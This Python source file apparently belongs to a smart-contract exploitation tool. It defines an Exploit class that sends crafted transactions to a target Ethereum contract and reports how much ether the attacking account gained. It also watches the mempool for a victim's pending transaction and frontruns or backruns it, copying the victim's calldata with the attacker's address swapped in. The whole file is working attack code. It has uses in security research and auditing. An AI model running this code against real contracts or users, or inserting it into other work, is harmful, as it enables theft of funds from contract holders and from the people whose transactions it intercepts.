from web3 import Web3
import time
import logging


class Exploit:
    def __init__(
        self,
        txs: list,
        w3: Web3,
        contract: str,
        account: str,
        account_pk: str,
        title: str = None,
        description: str = None,
        swc_id: int = 0,
        verbosity: int = logging.INFO,
    ):
        # Web3 instance (can be HTTP, WebSockets, IPC)
        self.w3 = w3
        # Meta information
        self.title = title
        self.description = description
        self.swc_id = swc_id
        # Transaction list
        self.txs = txs

        # Contract to attack
        self.contract = Web3.toChecksumAddress(contract)
        # Account to send transactions from
        self.account = Web3.toChecksumAddress(account)
        # Account's private key
        self.account_private_key = account_pk

        # Gas price when executing exploit
        self.gas_price = 1 ** 10
        # Gas price increment when frontrunning
        self.gas_price_increment = 1
        # Gas value when `gas_estimate` is False
        self.gas = 200000
        # Gas increment when frontrunning
        self.gas_increment = 1
        # Estimate gas when sending transactions
        self.gas_estimate = True

        # Sleep in seconds when scanning mem pool
        self.sleep = 1

        # Wait for transactions to be mined
        self.wait = True

        # Logging
        self.logger = logging.getLogger("Exploit")
        logger_stream = logging.StreamHandler()
        logger_stream.setLevel(verbosity)
        logger_stream.setFormatter(logging.Formatter("%(asctime)s - %(message)s"))
        if self.logger.hasHandlers() is False:
            self.logger.addHandler(logger_stream)

    def __repr__(self):
        return """Exploit: {title}
Description: {description}
SWC ID: {swc_id}
Transacion list: {txs}""".format(
            title=self.title,
            description=self.description,
            swc_id=self.swc_id,
            txs=self.txs,
        )

    def execute(self, nonce=None):
        receipts = []

        if nonce is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)
        else:
            nonce_index = nonce

        initial_balance = self.w3.eth.getBalance(self.account)

        for tx in self.txs:
            run_tx = {
                "from": self.account,
                "to": self.contract,
                "gasPrice": self.gas_price,
                "gas": self.gas,
                "value": tx.value,
                "data": tx.data.replace(
                    "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef", self.account[2:]
                ),
                "nonce": nonce_index,
            }
            nonce_index += 1

            # Estimate gas
            if self.gas_estimate is True:
                self.logger.debug("Estimating gas for tx: {tx}".format(tx=run_tx))
                run_tx["gas"] = self.w3.eth.estimateGas(run_tx)

            receipts.append(self.send_tx(run_tx))

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance_ether:.2f} ether ({balance})".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

        self.logger.debug(receipts)

    def _front_back_run(
        self, flush=False, nonce_index=None, wait_txs=None, send_txs=None, run_type=None
    ):
        if run_type is None:
            self.logger.error(
                "Must specify if it should frontrun or backrun transactions."
            )
            return

        self.logger.info("Scanning the mem pool for transactions...")

        if nonce_index is None:
            nonce_index = self.w3.eth.getTransactionCount(self.account)
        else:
            nonce_index = nonce_index

        initial_balance = self.w3.eth.getBalance(self.account)

        # If we don't specify a different set of transactions to wait for, use the ones in the exploit
        if wait_txs is None:
            wait_txs = self.txs

        # If we don't specify a different set of transactions to send, use the ones in the exploit
        if send_txs is None:
            send_txs = self.txs

        if len(wait_txs) != len(send_txs):
            self.logger.error(
                "The number of transactions we're waiting for needs to match the number of transactions to send. {wait_len} != {send_len}".format(
                    wait_len=len(wait_txs), send_len=len(send_txs)
                )
            )
            return

        # Wait for each tx and frontrun it.
        index = 0
        for tx in wait_txs:
            self.logger.info("Waiting for tx: {tx}".format(tx=tx))

            victim_tx = self.wait_for(self.contract, tx, flush=flush)
            self.logger.info(
                "Found tx: {hash}".format(hash=victim_tx.get("hash").hex())
            )

            run_tx = {
                "from": self.account,
                "to": self.contract,
                "data": send_txs[index]
                .data.replace(
                    "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef", self.account[2:]
                )
                .replace(victim_tx["from"], self.account[2:]),
                "gas": victim_tx["gas"] + self.gas_increment,
                "value": send_txs[index].value,
                "nonce": nonce_index,
            }
            if run_type == "frontrun":
                run_tx["gasPrice"] = hex(
                    victim_tx["gasPrice"] + self.gas_price_increment
                )
            elif run_type == "backrun":
                run_tx["gasPrice"] = hex(
                    victim_tx["gasPrice"] - self.gas_price_increment
                )

            nonce_index += 1

            # Estimate gas
            if self.gas_estimate is True:
                try:
                    run_tx["gas"] = self.w3.eth.estimateGas(run_tx) + self.gas_increment
                    self.send_tx(run_tx)
                except ValueError:
                    self.logger.error("Could not estimate gas.")
                except Exception as e:
                    self.logger.error("Exception caught: {}".format(e))
            else:
                self.send_tx(run_tx)

            index += 1

        final_balance = self.w3.eth.getBalance(self.account)
        self.logger.info(
            "Initial balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=initial_balance, balance_ether=initial_balance / 10 ** 18
            )
        )
        self.logger.info(
            "Final balance: \t{balance} ({balance_ether:.2f} ether)".format(
                balance=final_balance, balance_ether=final_balance / 10 ** 18
            )
        )

    def frontrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="frontrun",
        )

    def backrun(self, flush=False, nonce_index=None, wait_txs=None, send_txs=None):
        self._front_back_run(
            flush=flush,
            nonce_index=nonce_index,
            wait_txs=wait_txs,
            send_txs=send_txs,
            run_type="backrun",
        )

    def send_tx(self, tx: dict) -> str:
        # Make sure the addresses are checksummed.
        tx["to"] = Web3.toChecksumAddress(tx["to"])

        signed_tx = self.w3.eth.account.signTransaction(tx, self.account_private_key)
        self.logger.info("Sending tx: {tx}".format(tx=tx))
        tx_hash = self.w3.eth.sendRawTransaction(signed_tx.rawTransaction)
        if self.wait is True:
            self.logger.info(
                "Waiting for {tx_hash} to be mined...".format(tx_hash=tx_hash.hex())
            )
            tx_receipt = self.w3.eth.waitForTransactionReceipt(tx_hash, timeout=300)
            self.logger.info("Mined")
            self.logger.debug("Receipt: {}".format(tx_receipt))
            return tx_receipt
        else:
            return None

    def wait_for(self, contract, tx, flush=False):
        # Setting up filter
        pending_filter = self.w3.eth.filter("pending")

        # Ignore existing transactions and wait for new ones
        if flush is True:
            self.logger.debug(
                "Flushing {} existing transactions.".format(
                    len(pending_filter.get_new_entries())
                )
            )

        while True:
            time.sleep(self.sleep)
            pending_txs_hashes = pending_filter.get_new_entries()
            self.logger.debug(
                "Processing {} transactions.".format(len(pending_txs_hashes))
            )
            for tx_hash in pending_txs_hashes:
                pending_tx = self.w3.eth.getTransaction(tx_hash)

                # Skip some uninteresting transactions
                if (pending_tx is None) or (pending_tx.get("to") is None):
                    continue

                # Skip transactions already mined
                if pending_tx.get("blockNumber") is not None:
                    continue

                if (pending_tx.get("to", str("")).lower() == contract.lower()) and (
                    pending_tx.get("input", "").lower() == tx.data.lower()
                    and (pending_tx.get("value", 0) == tx.value)
                ):
                    self.logger.debug(
                        "Found pending tx: {tx} from: {sender}.".format(
                            tx=pending_tx.get("hash", b"0").hex(),
                            sender=pending_tx.get("from"),
                        )
                    )
                    return pending_tx

    def dump_to_file(self, file=None):
        from theo import dump

        exploit_object = []
        for tx in self.txs:
            exploit_object.append(tx.__dict__)

        dump(ob=[exploit_object], filename=file)
